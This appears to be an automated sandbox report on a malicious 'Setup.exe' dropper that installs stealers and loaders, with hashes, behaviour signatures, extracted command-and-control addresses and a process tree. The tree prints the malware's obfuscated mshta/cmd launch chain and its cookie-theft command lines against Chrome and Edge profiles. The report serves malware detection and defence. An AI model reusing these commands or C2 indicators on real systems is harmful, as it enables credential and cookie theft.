Overview

overview

10

Static

static

Setup (1).exe

windows11_x64

10

Setup (10).exe

windows11_x64

10

Setup (11).exe

windows11_x64

10

Setup (12).exe

windows11_x64

10

Setup (13).exe

windows11_x64

10

Setup (14).exe

windows11_x64

10

Setup (15).exe

windows11_x64

10

Setup (16).exe

windows11_x64

10

Setup (17).exe

windows11_x64

10

Setup (18).exe

windows11_x64

10

Setup (19).exe

windows11_x64

10

Setup (2).exe

windows11_x64

10

Setup (20).exe

windows11_x64

10

Setup (21).exe

windows11_x64

Setup (22).exe

windows11_x64

Setup (23).exe

windows11_x64

1

Setup (24).exe

windows11_x64

10

Setup (25).exe

windows11_x64

10

Setup (26).exe

windows11_x64

10

Setup (27).exe

windows11_x64

10

Setup (28).exe

windows11_x64

10

Setup (29).exe

windows11_x64

10

Setup (3).exe

windows11_x64

10

Setup (30).exe

windows11_x64

10

Setup (31).exe

windows11_x64

10

Setup (4).exe

windows11_x64

10

Setup (5).exe

windows11_x64

10

Setup (6).exe

windows11_x64

10

Setup (7).exe

windows11_x64

10

Setup (8).exe

windows11_x64

1

Setup (9).exe

windows11_x64

10

Setup.exe

windows11_x64

10

Resubmissions

15/10/2024, 15:36

241015-s1zlzasdkc 10

01/07/2024, 18:32

240701-w6yteawhmq 10

01/07/2024, 14:52

240701-r82wmaxdnd 10

01/07/2024, 14:52

240701-r8syqa1dpp 10

11/03/2024, 21:22

240311-z8dsssgg58 10

01/09/2021, 13:18

210901-5bmxjspa5s 10

01/09/2021, 13:04

210901-te4btfspqa 10

01/09/2021, 05:12

210901-4wnkwm1p3j 10

31/08/2021, 21:47

210831-41rp97dma2 10

Analysis

  • max time kernel
    269s
  • max time network
    1807s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    21/08/2021, 19:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Setup.exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score
10/10
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.08backdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx

Malware Config

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/
rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Suspicious use of NtCreateProcessExOtherParentProcess 30 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
    evasion
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 11 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 30 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 61 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Users\Admin\Documents\l24_2c3iZfsKyo0GCglOlw5j.exe
      "C:\Users\Admin\Documents\l24_2c3iZfsKyo0GCglOlw5j.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        3⤵
        • Executes dropped EXE
        PID:2800
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:4092
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:4716
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
            PID:2776
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            4⤵
              PID:4700
          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
            3⤵
            • Executes dropped EXE
            PID:3504
          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
            3⤵
            • Executes dropped EXE
            PID:4288
            • C:\Users\Admin\AppData\Local\Temp\11111.exe
              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              4⤵
                PID:3088
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                4⤵
                  PID:4872
                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  4⤵
                  • Executes dropped EXE
                  PID:5772
                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  4⤵
                    PID:6116
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                      PID:6640
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      4⤵
                        PID:5912
                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        4⤵
                          PID:3140
                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          4⤵
                            PID:5156
                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            4⤵
                              PID:5336
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                                PID:2860
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                  PID:2380
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:2268
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                      PID:4872
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                        PID:848
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:2732
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:5276
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:4432
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:4216
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:4308
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                    PID:3536
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:6812
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                        PID:3644
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        4⤵
                                                          PID:7052
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                            PID:1960
                                                      • C:\Users\Admin\Documents\5SPAZH1HbzMq0Vao9cjy4BpP.exe
                                                        "C:\Users\Admin\Documents\5SPAZH1HbzMq0Vao9cjy4BpP.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2776
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 312
                                                          3⤵
                                                          • Program crash
                                                          PID:4368
                                                      • C:\Users\Admin\Documents\fUvOQbM36kCml0HNWVi3cbVo.exe
                                                        "C:\Users\Admin\Documents\fUvOQbM36kCml0HNWVi3cbVo.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4812
                                                        • C:\Users\Admin\Documents\fUvOQbM36kCml0HNWVi3cbVo.exe
                                                          "C:\Users\Admin\Documents\fUvOQbM36kCml0HNWVi3cbVo.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:1464
                                                      • C:\Users\Admin\Documents\EV8w375rcIGgT3NIMGQ_QA5x.exe
                                                        "C:\Users\Admin\Documents\EV8w375rcIGgT3NIMGQ_QA5x.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:5104
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\EV8w375rcIGgT3NIMGQ_QA5x.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\EV8w375rcIGgT3NIMGQ_QA5x.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                          3⤵
                                                            PID:2744
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\EV8w375rcIGgT3NIMGQ_QA5x.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\EV8w375rcIGgT3NIMGQ_QA5x.exe" ) do taskkill -f -iM "%~NxA"
                                                              4⤵
                                                                PID:2096
                                                                • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                  hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:2068
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                    6⤵
                                                                      PID:3852
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                        7⤵
                                                                          PID:1716
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                        6⤵
                                                                        • Loads dropped DLL
                                                                        PID:5352
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill -f -iM "EV8w375rcIGgT3NIMGQ_QA5x.exe"
                                                                      5⤵
                                                                      • Kills process with taskkill
                                                                      PID:4512
                                                              • C:\Users\Admin\Documents\gD9dbig25PuBrIZk5PNawszE.exe
                                                                "C:\Users\Admin\Documents\gD9dbig25PuBrIZk5PNawszE.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:3628
                                                              • C:\Users\Admin\Documents\RgAWv4DjmgYf5kQaD0famu5J.exe
                                                                "C:\Users\Admin\Documents\RgAWv4DjmgYf5kQaD0famu5J.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5064
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 280
                                                                  3⤵
                                                                  • Program crash
                                                                  • Checks processor information in registry
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1592
                                                              • C:\Users\Admin\Documents\_ug4l1wqsAxx9yYm6xbQM2Gs.exe
                                                                "C:\Users\Admin\Documents\_ug4l1wqsAxx9yYm6xbQM2Gs.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4624
                                                                • C:\Users\Admin\Documents\_ug4l1wqsAxx9yYm6xbQM2Gs.exe
                                                                  C:\Users\Admin\Documents\_ug4l1wqsAxx9yYm6xbQM2Gs.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1552
                                                              • C:\Users\Admin\Documents\yq4W9gZXZPayEkhGzzju2ud0.exe
                                                                "C:\Users\Admin\Documents\yq4W9gZXZPayEkhGzzju2ud0.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5060
                                                                • C:\Users\Admin\Documents\yq4W9gZXZPayEkhGzzju2ud0.exe
                                                                  C:\Users\Admin\Documents\yq4W9gZXZPayEkhGzzju2ud0.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:4304
                                                                • C:\Users\Admin\Documents\yq4W9gZXZPayEkhGzzju2ud0.exe
                                                                  C:\Users\Admin\Documents\yq4W9gZXZPayEkhGzzju2ud0.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:428
                                                              • C:\Users\Admin\Documents\ZgH1jquXREuOZH48Jd1Nm_5V.exe
                                                                "C:\Users\Admin\Documents\ZgH1jquXREuOZH48Jd1Nm_5V.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:1204
                                                              • C:\Users\Admin\Documents\dasXt_kyYGd_vJ6mDsB2gb8U.exe
                                                                "C:\Users\Admin\Documents\dasXt_kyYGd_vJ6mDsB2gb8U.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4636
                                                              • C:\Users\Admin\Documents\exHoH1xVW8_xE8N_4aL8Vpn2.exe
                                                                "C:\Users\Admin\Documents\exHoH1xVW8_xE8N_4aL8Vpn2.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:1168
                                                              • C:\Users\Admin\Documents\Wt64IJ_9NyzFglCle1SlM7Pt.exe
                                                                "C:\Users\Admin\Documents\Wt64IJ_9NyzFglCle1SlM7Pt.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:1900
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 236
                                                                  3⤵
                                                                  • Program crash
                                                                  • Checks processor information in registry
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3976
                                                              • C:\Users\Admin\Documents\XJthJoCobEAakwe5FuRXR2Pd.exe
                                                                "C:\Users\Admin\Documents\XJthJoCobEAakwe5FuRXR2Pd.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:3868
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 316
                                                                  3⤵
                                                                  • Program crash
                                                                  • Checks processor information in registry
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1932
                                                              • C:\Users\Admin\Documents\Y4m_3U_Gus6hQo2g8ws6rHmk.exe
                                                                "C:\Users\Admin\Documents\Y4m_3U_Gus6hQo2g8ws6rHmk.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1480
                                                              • C:\Users\Admin\Documents\JMztoLMp8iAl0ph_yhi6gBgK.exe
                                                                "C:\Users\Admin\Documents\JMztoLMp8iAl0ph_yhi6gBgK.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:72
                                                                • C:\Users\Admin\AppData\Roaming\1264258.exe
                                                                  "C:\Users\Admin\AppData\Roaming\1264258.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4816
                                                                  • C:\Windows\system32\WerFault.exe
                                                                    C:\Windows\system32\WerFault.exe -u -p 4816 -s 2308
                                                                    4⤵
                                                                    • Program crash
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    PID:3928
                                                                • C:\Users\Admin\AppData\Roaming\1910321.exe
                                                                  "C:\Users\Admin\AppData\Roaming\1910321.exe"
                                                                  3⤵
                                                                    PID:1456
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:2872
                                                                  • C:\Users\Admin\AppData\Roaming\7127454.exe
                                                                    "C:\Users\Admin\AppData\Roaming\7127454.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:3348
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1536
                                                                      4⤵
                                                                      • Program crash
                                                                      • Enumerates system info in registry
                                                                      PID:1124
                                                                  • C:\Users\Admin\AppData\Roaming\6176671.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6176671.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:4080
                                                                • C:\Users\Admin\Documents\gxnpTOlCIiJUACEF6VRnUDO5.exe
                                                                  "C:\Users\Admin\Documents\gxnpTOlCIiJUACEF6VRnUDO5.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4556
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 292
                                                                    3⤵
                                                                    • Program crash
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3396
                                                                • C:\Users\Admin\Documents\tB_4ADwremCj42dSGRKYzGzK.exe
                                                                  "C:\Users\Admin\Documents\tB_4ADwremCj42dSGRKYzGzK.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:2852
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-CUD2R.tmp\tB_4ADwremCj42dSGRKYzGzK.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-CUD2R.tmp\tB_4ADwremCj42dSGRKYzGzK.tmp" /SL5="$1028A,138429,56832,C:\Users\Admin\Documents\tB_4ADwremCj42dSGRKYzGzK.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:3644
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TCR7H.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TCR7H.tmp\Setup.exe" /Verysilent
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:3540
